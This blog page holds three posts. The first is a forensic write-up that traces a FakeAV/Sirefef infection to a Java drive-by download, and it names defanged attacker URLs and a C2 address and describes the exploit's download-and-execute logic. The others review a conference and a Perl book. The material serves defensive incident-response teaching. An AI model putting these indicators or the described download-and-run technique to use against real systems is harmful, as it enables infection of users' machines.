Finding the Initial Infection Vector

Sunday, November 20, 2011 Posted by Corey Harrell 9 comments
There are different ways to spread malware. Email, instant messaging, removable media, or websites are just a few options leveraged to infect systems. One challenge when performing an examination is determining how the malware ended up on the system which is also referred to as identifying the malware’s initial infection vector (IIV). A few obstacles in determining the IIV is that a system changes over time: files are deleted, programs are installed, temporary folders are emptied, browser history is cleared, or an antivirus program cleaned the system. Every one of those obstacles may hinder the examination. However, they don’t necessary result in not being able to narrow down the IIV since some artifacts may still be present on the system pointing to the how.

There are various reasons provided why an examination isn’t performed on a malware infected system to locate the IIV. I first wanted to point out why taking the time to find the IIV is beneficial instead of focusing on the reasons why people don’t. The purpose of the root cause analysis is to identify the factors lead up to the infection and what actions need to be changed to prevent the reoccurrence of a similar incident. If the infected system is just cleaned and put back into production then how can security controls be adjusted or implemented to reduce malware infecting systems in a similar manner? Let’s see how this works by skipping the root cause analysis and placing blame on a user opening a SPAM email. A new security awareness initiative educates employees on not opening SPAM email which does very little if the malware was a result of a break down in the patch management process. Skipping figuring out the IIV is not only a lost opportunity for security improvements but it prevents knowing when the infection first occurred and what data may have been exposed. This applies to both organizations and individuals.

Determining how the malware infected a system is a challenge but that's not a good enough reason to not try. It may be easier to say it can’t be done, takes too much resources or it's not worth it since someone (aka users) never listen and did something they weren’t suppose to. As a learning opportunity I’m sharing how I identified the initial infection vector in a recent examination by showing my thought process and tool usage.

First things first… I maintain the utmost confidentiality in any work I perform whether if it’s DFIR or vulnerability assessments. At times on my blog I write detailed posts about actual examinations I performed and every time I’ve requested permission to do so. This post is no different. I was told I can share the information for the greater good since it may help educate others in the DFIR community who are facing malware infected systems.

Background Information

People don’t treat me as their resident “IT guy” to fix their computer issues anymore. They now usually contact me for another reason because they are aware that I’ve been cleaning infected computers for the past year free of charge. So it’s not a strange occurrence when someone contacts me saying their friend/colleague/family member/etc appears to be infected with a virus and needs a little help. That’s pretty much how this examination came about and I wasn’t provided with any other information except for two requests:

        * Tell them how the infection occurred so they can avoid this from happening again

        * Remove the viruses from the computer

     Investigation Plan

The methodology used throughout the examination is documented on the jIIr Methodology Page. I separated the various system examination steps into the first three areas listed below.

        1. Verify the system is infected
        2. Locate all malware present on the system
        3. Identify the IIV
        4. Eradicate the malware and reset any system changes

I organized the areas so each one will build on the previous one. My initial activities were to verify that the system was actually infected as opposed to the requester interpreting a computer issue as an infection. To accomplish this I needed to locate a piece of malware on the system either through antivirus scanning or reviewing the system auto-run locations. If malware was present then the next thing I had to do was locate and document every piece of malware on the computer by: obtaining general information about the system, identifying files created around the time frame malware appeared, and reviewing the programs that executed on the system. The examination would require since the technique excels at highlighting malware on a system. The third area and the focus of this post was to identify the initial infection vector. The IIV is detected by looking at the system activity in the timeline around the timeframe when each piece of malware was dropped onto the system. The activity can reveal if all of the malware is from the same attack or if there were numerous attacks resulting in different malware getting dropped onto the system. The final area is to eradicate every malware identified.

Note: Some activities were conducted in parallel to save time. To make it easier for people to follow my examination I identified each activity with the symbol <Step #>, the commands I ran are in bold, and registry and file paths are italicized.

Verifying the Infection

The computer’s hard drive was connected to my workstation and a software write blocker prevented the drive from being modified. I first reviewed the master boot record (MBR) to see the drive configuration I was dealing with and to check for signs of MBR malware <Step 1>. I ran the Sleuthkit command: mmls.exe -B \\.\PHYSICALDRIVE1 (the -B switch shows the size in bytes). There was nothing odd about the hard drive configuration and I found out that additional time was needed to complete the examination since I was dealing with a 500 GB hard drive. To assist with identifying known malware on the system I fired off a Kaspersky antivirus scan against the drive <Step 2>.

Knowing the antivirus scan was going to take forever to complete I moved on to checking out the system’s auto-runs locations for any signs of infection. The Sysinternals AutoRuns for Windows utility was executed against the Windows folder and the only user profile on the system <Step 3>. In the auto-runs I was looking for unusual paths launching executables, misspelled file names, and unusual folders/files. It wasn’t long before I came across an executable with a random name in the HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell registry key.

The HKCU\Software\Microsoft\Windows\CurrentVersion\Run registry key also listed under Auto-runs Logon tab showed that the C:\Users\John_Doe\AppData\Roaming folder had more than just one randomly named executable. The key also showed an additional location which was the C:\Users\John_Doe\AppData\Roaming\Microsoft folder.

I added the hard drive as an evidence item in FTK Imager v3 to review the folders and executables identified by the Auto-runs utility <Step 4>. I noticed there were two additional executables located directly underneath the Roaming folder with the names iexplore.exe and java.exe. Both files had the same MD5 hash e4c2a000e715d16ec25e2b0a0fb3532f so to confirm the infection I searched for the hash in the Malware Analysis Search custom Google search. There was one search hit for VirScan.org and a few scanners flagged the file as malware (Kaspersky identified it as Trojan.Win32.FakeAV.emha). I followed the similar process to confirm that the other executables were malware as well. At this point I no longer needed the antivirus scan to finish since the infection was verified through other means. Before I moved onto manually locating all malware on the system I needed to document what my timeframe of interest was. I looked at the last modification times and creation times for all the folders/files I found. The rough timeframe spanned over a few days: from 10\13\2011 1:29:34 AM to 10/08/11 11:38:48PM. The picture below shows the last modification times for a few folders in the C:\Users\John_Doe\AppData\Roaming folder.


Locating All Malware on the System

After I verified the system was in fact infected I then proceeded to locate and document every piece of malware. First I had to shed light on the system’s configuration since it would impact how I performed my analysis <Step 5>. I used my regripper-general-os-info.bat batch file to run RegRipper against the system’s registry hives including the one profile’s NTUSER.dat hive. Below I highlighted some information and to the right of the arrow are quick notes about its significance.

        * Operating system was Windows 7 Home Premium <= affected what artifacts are available and where they are located

        * OS Install Date was Sun Feb 20 23:26:29 2011 (UTC) <= may assist with identify activity occurring before this date

        * Timezone was Eastern Standard <= needed to understand time information

        * The registry setting NtfsDisableLastAccessUpdate was enabled <= can’t use files’ last access times since it’s not tracked (default setting in Windows 7)

        * Profilelist registry key only showed one user account besides the default ones <= focused the examination around the activity for one specific user account

       * Installer\UserData registry key showed the following programs: Microsoft Office 2010 including Outlook, iTunes v.10, QuickTime v.7.69, Adobe Reader v9.3.4, and Java(TM) 6 Update 17 <= identified applications that could have been responsible for the malware infection

       * Default browser plugin showed the default browser was Internet Explorer <= system had two web browsers (Chrome was the other) so my initial focus is on the artifacts from the default one

       * Listsoft registry key showed McAfee <= McAfee antivirus software was on the system and its logs may show additional information about the infection.

I opted for the timeline analysis technique to locate all malware on the system and the general information obtained about the system helped to narrow down my artifact list to incorporate into my timeline. Building a timeline on a 500 GB hard drive was going to take some time so I looked at the McAfee logs before tying up my workstation <Step 6>. I exported the McAfee logs with FTK Imager and reviewed them using Notepad ++. The last entry in the log occurred at 10/16/2011 6:50:09 PM and it logged that the file "C:\windows\system32\consrv.DLL" was detected as Generic.dx!bbd4. The next entry didn’t occur until 10/12/11 but there were numerous log entries leading right up until 10/08/11. A few detections included Generic Dropper!1cj, DNSChanger!fa, and Artemis!E4C2A000E715 and they were for files located the folders C:\Users\John_Doe\AppData\Local\Temp\, C:\Windows\assembly\tmp\, and C:\windows\syswow64\. The flurry of McAfee detections for files other than cookies stopped at 10/8/2011 11:37:38 PM as shown in the picture below.

The McAfee log identified potential additional malware on the system and expanded my timeframe to 10/16/2011 6:50:09 PM to 10/08/11 11:37:38 PM. A significant piece of information the log highlighted was Internet activity occurred just before the first detection. I leverage the timeline analysis technique for the rest of the examination. I created a timeline by incorporating the following artifacts: event logs (evtx), registry hives (system, software, and ntuser), link files (win_link), prefetch files (prefetch), Internet Explorer history (iehistory), and the Master File Table (mft) <Step 7>. I ran the following command but replaced the plugin and file path for each desired artifact: log2timeline.pl -f evtx -w timeline.csv E:\Windows\System32\winevt\Logs\Application.evtx. Once my timeline was built I then I started my search for all malware on the system.

Identify the IIV

Locating all malware present on the system and identifying the IIV are not separate activities when I perform timeline analysis. The only reason I separated them was to make it easier to explain my thought process. In actuality the two go hand in hand. Each time a piece of malware is located the system activity around the malware is examined to determine what contributed to the malware being created. Approaching timeline analysis in this manner will help determine if the malware is from the one attack or multiple attacks at different points in time. I review timelines working backwards in time since I find that it’s easier to spot the IIV. Each time I come across a file that could be malicious I first review the file’s header (in this examination I used FTK Imager), perform searches for the file’s MD5 hash (search order is Malware Analysis Search, VirusTotal, and then Google), and at times if the hash search results in no hits and the file type is of interest then I may upload the file to VirusTotal to see if it’s detected. I continue this process in the timeline until I reach the point where the malware activity stops and that’s usually where the IIV is located.

To assist with confirming malicious files I used FTK Imager to export a file hash list for the entire hard drive <Step 8>. It’s a lot easier to already have files’ hashes on hand then it is to calculate the hash each time I come across a new file. I started working my timeline keeping in mind everything I found including the timeframe 10/16/2011 6:50:09 PM to 10/08/11 11:37:38 PM. Besides the timestamps that were not accurate (reflects activity in future) the timeline ended on 10/16/2011 so that is where I started my analysis. I first saw the consrv.dll file detected by McAfee but there were no artifacts around the malware indicating it was the result of a different attack.

After 10/16/11 the next activity started appearing in the timeline on 10/12/11. I found the same thing; more malware and artifacts associated with malware but no artifacts indicating an attack occurred.


I kept working the timeline going backwards in time. I kept finding more malware and malware artifacts but nothing pointing to an IIV explaining how the malware got onto the system. I finally reached the earliest time I noted which was 10/08/11 11:37:38 PM. There was a lot of activity involving files with similar names to the ones reflected in the McAfee log file.

I continued working backwards until I saw no more activity involving the C:\Windows\assessmbly\tmp\U\ folder which is shown in the screenshot below. The U folder was created on the system at the same time as a file resembling a configuration file. One line in the file was srv=hxxps://212.36.9.52/ and my research showed the address appeared in a blacklist and the spsyeyetracker IP blocklist. The activity just before the U folder and configuration file were created was an executable named dbywqomgec (MD5 hash a70e5c48612159b3e936d7e478f4d451) appearing in the John_Doe’s temp folder. VirusTotal showed a few antivirus programs identified the file as a dropper (Microsoft detection was TrojanDropper:Win32/Sirefef.B). Afterwards I analyzed the file with ThreatExpert to see what changes the malware caused.

The activity on the system before the dropper (MD5 hash a70e5c48612159b3e936d7e478f4d451) appeared on the system was a file showing up in the Java cache folder as shown below.

I previously discussed the forensic significance Java index files provide in the post (Almost) Cooked Up Some Java. I exported the Java index file 46e770f3-38b55d85.idx with FTK Imager and looked at the file with Notepad ++. The file’s contents are shown below.

The index file 46e770f3-38b55d85.idx showed a few interesting tidbits. First the file 46e770f3-38b55d85 was downloaded from the URL hxxp://www.seyminck.com/FFFO009/560[dot]gif which had the IP address 212.95.55.40. Secondly, the URL indicated the file was a gif image but the index recorded the file as an application. I checked the file 46e770f3-38b55d85 (MD5 hash 2e833ac26483aaad13a8051bc857ef15) header and it was indeed an executable since the file started with MZ. I analyzed the file with ThreatReport and it was identified as a dropper (Microsoft detection was TrojanDropper:Win32/Sirefef.B). The IIV still wasn’t located so I looked at the activity just before the dropper appeared in the Java cache. The activity showed at the same time another duplicate of the dropper (MD5 hash 2e833ac26483aaad13a8051bc857ef15) appeared in the John_Doe’s temp folder with the file name 0.945837921339929.exe. Four seconds beforehand a file appeared in the Java cache folder which can be seen below highlighted in red.

The Java index file 25e8c780-5c17647b.idx was exported with FTK Imager and read with Notepad ++. The information contained in the index showed that a Java archive file was downloaded from the URL hxxp://www.seyminck(dot)com/FFFO009/RRo/realestate (IP address 212.95.55.40). The Java archive came from the same domain and IP address as the executable located in the Java cache folder. I exported the Java archive 25e8c780-5c17647b (MD5 hash 6b478de65071d94c670a0bfa369a7890) and confirmed the file was a Jar file by examining it with JD-GUI. The MD5 hash search didn’t result in any hits so I uploaded the file to VirusTotal and only 2 out of 42 antivirus products detected it as an exploit. I wanted to know if Java actually executed around the time the exploit appeared in the cache. I exported and reviewed the Java log file C:\Users\John_Doe\AppData\Local\Temp\java_install_reg.log and the log showed Java did in fact execute.

The last piece I needed to identify the IIV was to determine what delivered the exploit to the system. The activity on the system before the exploit answered that question as shown below.

There was a PrivacIE entry for seyminck(dot)com/FFFO009/RRo/*87354602 which means the exploit came from third party content being displayed on a website. The PrivacIE entry was mixed in with activity resembling advertisements from the user searching for someone on peoplefinder and whitepages websites. I continued working backwards in the timeline but there was no more malware activity. The IIV was identified. A user was surfing the Internet when a website visited was hosting third party content which resulted in a successful drive-by download targeting a Java vulnerability.

More Information about the IIV

The Java archive 25e8c780-5c17647b (MD5 hash 6b478de65071d94c670a0bfa369a7890) didn’t have to be examined closer in order to identify the IIV. However, I wanted to better understand how to examine Jar files since they may provide more information about the IIV and help explain some files found on the system. I debated if I should put this section in another blog post because I didn’t want people to think this activity had to be done in order to figure out the IIV. I opted to include the information since it sheds light on what occurred when the exploit was downloaded.

The code in the Jar file was obfuscated to conceal its purpose. I reached out to the Win4n6 group about any methods to automate analyzing Jar files with obfuscated code. A few members pointed me to Java de-obfuscation tools and I’m still in the process of trying to learn how to use them. Another member mentioned that Java obfuscation appears to be not making analysts’ life difficult, but to evade detection by antivirus. The person went on to say the obfuscation is usually weak so it’s relatively simple to de-obfuscate. My first reaction was it may be simple for Java programmers but it seemed impossible to me; I know nothing about Java besides the artifacts left by Java exploits. I took a shot at manually trying to see what the Jar file did by focusing on trying to follow the logic associated the variables, class methods, and functions in the code (I don’t know the Java syntax so if I butcher the names of things such as functions then you know why).

I opened the Java archive 25e8c780-5c17647b in JD-GUI and looked at the manifest file to see the wall Java class gets executed first.

I extracted the Java source code by using the “Save All Sources” option in JD-GUI. I started reviewing the obfuscated source code in the Wall Java class when I saw two lines of code making a call to the Java method Muuum.kjdhfdkjg or Muuum.idufhidufh. For those who don’t know what a Java method is: it’s basically going to the Muuum class and executing the code listed under the method kjdhfdkjg or idufhidufh.

I followed the code to the Muuum class file and found out its purpose was to set a variable to contain an URL. Two variables are set to contain part of the URL and they are then used to build the entire URL. One URL that is built is hxxp://www.seyminck.com/ FFFO009 /560[dot]gif and this was the URL I found in the Java index 46e770f3-38b55d85.idx showing it was where the executable file 46e770f3-38b55d85 (MD5 hash 2e833ac26483aaad13a8051bc857ef15) came from. The screenshot below shows the URL being put together.

I went back to the Wall class and kept reading the code until I came across the first Java function as shown below. The Inputstream function reads data and the data being read was coming from the Java method Kkdjfhgdkfjhgkdfjhgkkkkkkkkkkkk.sodarifhsdoiufhdoiufg86fetgfyusgfyudif. I highlighted the Inputstream function in green while the Java method is highlighted in red.

The followed the code to the sodarifhsdoiufhdoiufg86fetgfyusgfyudif method. The method set the variable URL to contain the value contained in variable s3 which the Wall Java class passed to the method. The method ended with by returning a call to another method in the Kkdjfhgdkfjhgkdfjhgkkkkkkkkkkkk class as highlighted in red below.

Next I went to the mmmm3 method which is pictured below. The first function InputStream sets the URL to read from while the second function Openstream reads the URL stored in the URL variable. I couldn’t find the code that resulted in the URL variable containing the domain hxxp://www.seyminck[dot]com. However, this was the URL the method was reading from becaue the Jar file didn’t reference any other websites. The method returns to the Wall class the data read from the URL.

I went back to the Wall class and continued to follow the code. The next portion I picked up on is the data read from the URL was saved to a file with an exe extension. The picture below shows the code that accomplished this and I highlighted a few areas to make it easier to see. The variable ufy highlighted in the first red box was set to contain a string with a random number ending in .exe. The next variable iioi655er5w5 (highlighted in blue) was set to contain another variable concatenated with the ufy variable at the end. This means the string contained in iioi655er5w5 ends in .exe. The function FileOutputStream writes data to a file and names the file with the string in the iioi655er5w5 variable.

The previous code explains the activity on the system immediately after the exploit was downloaded. Reading the URL hxxp://www.seyminck.com/FFFO009/560[dot]gif resulted in Java caching the file while Java wrote the data to a file with an .exe file extension. The Java index file 25e8c780-5c17647b.idx showed that the file 46e770f3-38b55d85 (MD5 hash 2e833ac26483aaad13a8051bc857ef15) in the Java cache was read from the URL in the Java exploit. Another file with the same MD5 hash was created on the system at the same time and was named a random number with exe as the file extension.

At the bottom of the previous screenshot shows the Java method Kkdjfhgdkfjhgkdfjhgkkkkkkkkkkkk.kjsf8888 being called and the variable iioi655er5w5 (contains the filename ending in .exe) is passed for the method to use. The picture below is a close up of the method call.

My journey following the code ended when I went to the kjsf8888 method in the Kkdjfhgdkfjhgkdfjhgkkkkkkkkkkkk class file. The code highlighted in green in the picture below highlights the function Runtime exec executing the file contained in the iioi655er5w5 variable which is a file whose name is random number with an .exe extension (seems like this file 0.945837921339929.exe found on the system). The activity on the system after 0.945837921339929.exe was created in the temp folder was another dropper (MD5 hash a70e5c48612159b3e936d7e478f4d451) showing up on the system. To me this further confirms the Jar file was successful in exploiting a vulnerability in Java and this was how the system became infected in the first place.

Summary

I went into the examination planning on to perform a surgical malware removal and ended up doing a complete system rebuild due to how bad the infection was. The initial infection vector was a user surfing the Internet and coming across a website hosting third party content which resulted in a successful drive-by download targeting some Java vulnerability. Going back to the person and telling them how the infection happened makes it easier for them to change what lead up to the issue. I would have done a disservice if I skipped trying to find the IIV and went back to the person with a laundry list of recommendations. Enable the firewall, use strong passwords, update anti-virus software, use caution with opening attachments, use caution clicking on links, update computer software, etc … Throwing out a laundry list of recommendations is a lost opportunity to improve security since it doesn’t address the root cause. Trying to implement five or ten recommendations is a lot harder than focusing on the one recommendation that actual caused the infection.

Identifying the IIV is a challenge worth confronting. For success one not only needs to understand the forensic artifacts located on a system and their significance but needs to know about attack vector artifacts and how to recognize them. Being able to understand both artifacts types can help in answering the question how did malware end up on the system.

PFIC 2011 Review

Monday, November 14, 2011 Posted by Corey Harrell 2 comments
Last week I had the opportunity to attend Paraben’s Forensic Innovations Conference (PFIC). I had a great time at PFIC; from the bootcamp to the sessions to the networking opportunities. Harlan posted his experience about PFIC, Girl Unallocated shared her thoughts, and SANs Digital Forensic Case Leads discussed the conference as well. The angle I’m going to take in my post is more of a play by play about the value PFIC offers and how the experience will immediately impact my work. Here are a few of my thoughts ….

Affordability

When I’m looking at conferences and trainings the cost is one of the top two things I consider. This is especially true if I’m going to ask my employer to pick up the tab. Similar to other organizations it is extremely hard to get travel approved through my organization. As a public sector employee at times it seems like I’d have better odds getting someone’s first born then to get a request approved through the finance office. The low cost to attend PFIC made it easier for me to get people to sign off on it. The conference with one day training was only $400. The location was the Canyons Resort and attendees got cheaper rates for lodging since it’s the off-season. Rounding out the price tag were the plane flight and shuttle from the airport; both expenses were fairly reasonable. Don’t be fooled by the low costs thinking PFIC is the equivalent of a fast food restaurant while the other conferences are fine dining. PFIC is not only an economical choice but the content covered in the bootcamp and sessions results in more bang for the buck. I like to think PFIC is the equivalent of fine dining with coupons. The cost was so reasonable that I was even going to swing the conference by myself if my employer denied my request to attend. That’s how much value I saw in the price tag especially when I compared it to other DFIR conferences.

Networking Opportunities

The one commonality I’ve see in other’s feedback about PFIC is how the smaller conference size provides opportunities to network with speakers and other practitioners. This was my first DFIR conference so I can’t comment about conference sizes. However, I agree about the ability to talk with people from the field. Everyone was approachable during the conference without having to wait for crowds to disperse. Plus if for some reason you were unable to connect between sessions then PFIC had evening activities such as casino night and night out in town. I meet some great people at the conference and was finally able to meet a few people I only talked to online. Going into the conference I underestimated the value in connecting with others since I was so focused on the content.

Content

Let’s be honest. A conference can be affordable and offer great networking opportunities but if the content is not up to par then the conference will be a waste of time and money. I have a very simple way to judge content; it should benefit my work in some way. This means none of the following would fit the bill: academics discussing interesting theories which has no relevance to my cases, vendors pimping some product as the only way to solve an issue, or presenters discussing a topic at such a high level there is no useful information I can apply to my work. One thing I noticed about the PFIC presenters was they are practitioners in the field discussing techniques and tools they used to address an issue. Pretty much each session I walked away from I felt like I learned a few useful things and got a few ideas to research further. Harlan said in his PFIC 2011 post that “there were enough presentations along a similar vein that you could refer back to someone else's presentation in order to add relevance to what you were talking about”. I think the same thing can be said from the attendee’s perspective. I sat through several presentations on incident response and mobile devices and it seemed as if the presentations built on one another.

I pretty much picked my sessions on a topic I wanted to know more about (incident response) and another topic I wanted to get exposed to (mobile devices). There were a few presentations I picked based on the presenter but for the most part my focus was on incident response and mobile devices. PFIC had a lot more to offer including e-discovery, legal issues, and digital forensics topics but I decided to focus on two specific topics. In the end I’m glad I did since each presentation discussed a different area about the topic which gave me a better understanding. I’m not discussing every session I attended but I wanted to reflect on a few.

        Incident Response

I started PFIC by attending the Incident Response bootcamp taught by Ralph Gorgal. The overview about the process used in the session is shown below and the activities highlighted in red is what the bootcamp focused on (everything to the right of the arrows are my notes about the activity).

     * Detection => how were people made aware
     * Initial Response => initial investigation, interviews, review detection evidence, and facts that incident occurred
     * Formulate Investigation/Collection Strategy => obtain network topology and operating systems in use
     * Identify Location of Relevant Evidence => determine sources locations, system policies, and log contents
     * Evidence Preservation => physical images, logical images, and archive retrieval
     * Investigation
     * Reporting

The approach taken was for us to simulate walking in to a network and trying to understand the network and what logs were available to us. To accomplish that we reviewed servers’ configurations including the impact different configuration settings have and identified where the servers where storing their logs. The Windows services explored during the bootcamp were: active directory, terminal services, internet information server (IIS), exchange, SQL, and ISA. The focus was more on following a logical flow through the network (I thought it was similar to the End to End Digital Investigation) and thinking about what kind of evidence is available and where it was located.

The bootcamp provided a thorough explanation about the thought process behind conducting log analysis during incident response. Even though the course didn’t touch on how to perform the log analysis other sessions offered at PFIC filled in the void. The first session was We’re infected, now what? How can logs provide insight? presented by David Nardoni and Tomas Castrejon. The session started out by first explaining what logs are, breaking down the different types of logs (network, system, security, and application), and explaining what the different log types can tell you. The rest of the session focused on using the free tools Splunk and Mandiant’s Highlighter to examine firewall and Windows event logs. I thought the presentation was put together well and the hands on portion examining actual logs reinforced the information presented to us. The other session I attended about log analysis was Log File Analysis in Incident Response presented by Joe McManus. The presentation was how web server and proxy logs can generate leads about an incident by using the open source tool Log Analysis Tool Kit (LATK). LATK helps to automate the process of log analysis by quickly showing log indicators such as top downloaders/uploaders, SQL queries, and vulnerable web page access. The session was a lab and in the hands on portion we examined web server and proxy logs. This was another session that was well put together and I think the coolest thing about both sessions, besides the great information shared, was that free tools were used to perform log analysis.

        Mobile Devices

Mobile devices are a topic I want to become more knowledgeable about. I went into PFIC wanting to learn a basic understanding about the forensic value contained in mobile devices and get some hands on experience examining them.

The first of the three Paraben labs I attended was Smartphone and Tablet Forensic Processing by Amber Schroader. This wasn’t my scheduled lab so I watched from the back as others did the hands on portion. Amber laid out a case study for the attendees who had to locate a missing 15 year old girl by using Device Seizure to examine an ipad and itouch. What I liked about the session was that answers weren’t provided to the audience which forced them to have to figure out what information on those devices could help locate the girl. A few of the areas examined included: Safari browsing history, Safari download history, Youtube history, facetime history, wifi locations, and pictures. After the case study Amber laid out the different areas on mobile devices containing relevant information but mentioned the biggest issue with mobiles is the sheer number of apps which changes how you look at your data. The next Paraben lab I sat through was Physical Acquisitions of Mobiles by Diane Barrett. The session explained the different methods to acquire a physical image which were chip off, JTAG test access port, flasher boxes, and logical software that can do physical. The cool part about the session was the hands on portion since we used a Tornado flasher box and Device Seizure to acquire a physical image from a Motorola phone. The last Paraben lab I attended was Introduction to Device Seizure by Amber Schroader and Eric Montellese. As the title indicates the session was an introduction on how device seizure can be used to examine mobile devices. The entire session was pretty much hands on; we performed logical and physical acquisitions of a Motorola phone and a logical acquisition of an Android. We also briefly examined both devices to see what information was available.

The only non-Paraben session about mobile devices I attended was iOS Forensics by Ben Lemere. The presentation discussed how to perform forensics on iOS devices using free tools. The information provided was interesting and added to my to-do list but I thought the session would have been better if it was a lab. It would have been awesome to try out the stuff the presenter was talking about.

        Digital Forensic Topics

I couldn’t come up with a better description than Digital Forensics Topics for the sessions I picked based on the presenter or topic. The one session I wanted to mention in this category was Scanning for Low Hanging Fruit in an Investigation by Harlan Carvey. I was really interested in attending Harlan’s session so I could finally see the forensic scanner he has been talking about. Out of all of the sessions I attended I think this was the only session where I knew about the topic being discussed (I follow Harlan’s blog and he has been discussing his forensic scanner). Harlan explained how the scanner is an engine that runs a series of checks searching for low hanging fruit (known artifacts on the system). The usage scenario he laid out involves:

     * Mount an acquired image as a volume (or mount a volume shadow copy)
     * Plug-ins (checks) are based on a specific usage profile
     * Scanner reports are generated including a log of activity (analysts name, details image, plugins ran, etc.)

Harlan mentioned the scanner is still in development but he still did a tool demo by parsing a system’s Windows folder. A few things I noted about what I saw: there’s better documentation than Regripper (analysts name and platform included), still rips registry keys, lists files in a directory (prefetch folder contents were showed), runs external programs (evt.pl was executed), hashes files, and performs different file checks. I saw the value in this kind of tool before I sat through the session but seeing it in action reinforces how valuable this capability would be. I currently try to mimic some activities with batch scripting (see my triage post or obtaining information post). Those scripts took some time to put together and would require some work to make them do something else. I can foresee the forensic scanner handling this in a few seconds since plugins would just need to be selected; plus the scanner can do stuff that's impossible with batch scripting.

Speaking of scripts … Harlan mentioned during his presentation a batch script I put together that runs Regripper across every volume shadow copy (VSC) on a system. I was caught a little off guard since I'd never imagined Harlan mentioning my work during his presentation. I probably didn’t do a good job explaining the script during the session since I wasn’t expecting to talk about it. Here is some information about the script. As Harlan mentioned, I added functionality to the script besides running Regripper (I still have a standalone script for Regripper in case anyone doesn’t want the other functions). The script can identify the differences between VSCs, hash files in VSCs, extract data (preserves timestamps and NTFS permissions) from VSCs, and list files in the VSC. The script demonstrates that you can pretty much do as you please with VSCs whether if you are examining a forensic image or live system. In a few weeks I’ll provide a little more information about the script and why I wrote it, and over the next few months I’ll write a series of posts explaining the logic behind the script before I release it.

PFIC Summary

Overall PFIC was a great experience. I learned a lot of information, I have a to-do list outlining the various things to research/test further, and I meet some great people. The return on investment for my company sending me to the conference is that in a few weeks I’ll be able to perform log analysis, I’m more knowledgeable about mobile device forensics, and if I get into a jam I now have a few people I can reach out to for help.

Closing out my post I wanted to share a few thoughts for improvement. I didn’t have many which I guess is a good thing. ;)

1. Make the names on the name tags bigger. I think my biggest struggle during the conference was trying to figure out peoples’ names since I couldn’t read the tags.

2. Presenters should answer all questions during the session if time permits; especially if the question is a follow-up to something the presenter said. Another attendee asked a great question but I had to stick around for about five minutes after the session to hear the answer. It wasn’t like the question was controversial or something.

3. Verify that all equipment works before the session. One of the labs hit a speed bump when numerous attendees (me included) couldn’t acquire a phone since numerous phones didn’t work. Everyone was able to do the acquisition eventually but time was lost trying to find phones that actually worked.
Labels: ,

Book Review Perl Programming for the Absolute Beginner

Monday, October 24, 2011 Posted by Corey Harrell 5 comments
I find myself in more situations where I’m not completely satisfied with my DFIR tools. They either don’t parse certain information or lack capabilities I want. Batch scripting helped in some situations but the scripts are limited in what I can do. For example, it’s difficult (if not impossible) to create a script to extract information from an artifact that’s not supported by existing tools. Learning a programming language has been at the top of my to-do list for some time due to these reasons. I was browsing my local book store when I came across the book Perl Programming for the Absolute Beginner.

Why Perl Programming for the Absolute Beginner

I chose the book after I skimmed through a few other Perl programming books. Perl Programming for the Absolute Beginner is written for an audience without previous programming experience. The book goes into great detail explaining basic programming concepts such as variables, arrays, loops, and subroutines. I took a C++ course in my undergraduate about seven years ago and the only thing I remember is that I took a C++ course. Basically, I have zero programming knowledge including not knowing much about programming concepts. A lot of the books I skimmed, such as Learning Perl, don’t take the time to explain the basic concepts since they expect the reader to be already familiar with them. I wanted a book to explain the basics in addition to the language; Perl Programming for the Absolute Beginner fit the bill.

Numerous books I looked at use exercises at the end of each chapter to reinforce the material covered. The exercises are pretty simple and perform one action such as a math calculation. Perl Programming for the Absolute Beginner takes a different approach in teaching Perl. Instead of individual exercises the book has the reader write computer games which are fully functioning programs. I thought this approach does a better job showing how to use Perl since it covers the planning, organizing, coding, and testing activities involved with script development. Plus the approach was entertaining and it kept my interest. I’d rather write a “Fortune Teller Game” than a script to compute “the circumference of a circle”. ‘nuff said.

What I learned

My review is going to be a little different. I’m neither discussing the book’s contents (if you want to know then read the table of contents) nor how helpful the book could be. Instead I’m talking about what I learned from the book and how it has impacted my DFIR work so far.

Seeing Behind the Curtain

Bear with me for this analogy… When I was younger I used to love watching Kung-fu. At times I watched movies completely in another language without subtitles. I got the gist of what was going on by watching body language, facial expressions, tones of people’s voices, and the bad guys getting stomped. However, when I watched the same movie in English (subtitles or dubbed over) I realized how much I missed about the movie’s plot. Learning Perl is the equivalent of adding subtitles or dubbed English to a Kung-fu movie. Before I understood the gist of what my Perl tools were doing but it’s completely different when you can read and actually understand the code to see how it produces its output. It let me see behind the tool abstraction curtain.

Extending my Capability

I was considering between learning Perl or Python since programs in my toolbox are written in those languages. One of my goals is to learn a language that lets me customize tools to better meet my needs. I picked Perl because two tools I extensively use are written in Perl and plug-in based. Plug-ins allow the tool to be extended fairly easily and I felt knowing how to write them would have a greater impact on my DFIR work. My immediate need was for a Regripper plug-in to parse the UserInfo registry key in an NTUSER.DAT hive (I could have asked others for this but I wanted to learn how to do it). In the past I manually examined the UserInfo key in the NTUSER.DAT hive and if present the hives in system restore points or volume shadow copies. Performing the task was time consuming but I needed to know the information. Perl Programming for the Absolute Beginner taught me enough about Perl to make it pretty easy to write a plug-in once I re-read the creating plug-ins section in Windows Registry Forensics. Taking the time to put the userinfo plug-in together will make things easier and faster for me in the future since I can now extract the information from a system in seconds. Talk about improving efficiency.

Breaking my Handcuffs

I’m still wearing handcuffs since I’m still dependent on existing tools and scripts created by others. However, Perl Programming for the Absolute Beginner opened my eyes to a future where if I encounter an artifact not supported by my tools then I could just write my own. A future where I no longer have to be satisfied and accept tools’ outputs when I want to see data differently. A future where repetitive tasks can be automated enabling me to spend more time on analyzing information. The book opened my eyes to a world where I don’t have to be handcuffed to my DFIR tools and the capabilities they provide. Perl Programming for the Absolute Beginner did not make me into a tool developer but it provided me with a foundation to build upon.

Four Star Review

Not all is rosy with the book though. I normally can overlook typos but I’m not very forgiven when there are typos in the code the reader is suppose to copy. It’s bad enough that beginners are going to mess something up and spend time tracking down their own mistakes. There’s no need to add even more typos resulting in people questioning themselves wondering what else they did wrong. Chapter Four’s Star Wars Quiz declares a variable named $valid but the rest of the program uses the variable $isvalid (on page 129). That small typo makes the game not work until the variable $valid is changed to $isvalid. As a reader I shouldn’t be required to find typos in code in order to make things work. I spend enough time finding my own mistakes as it is.

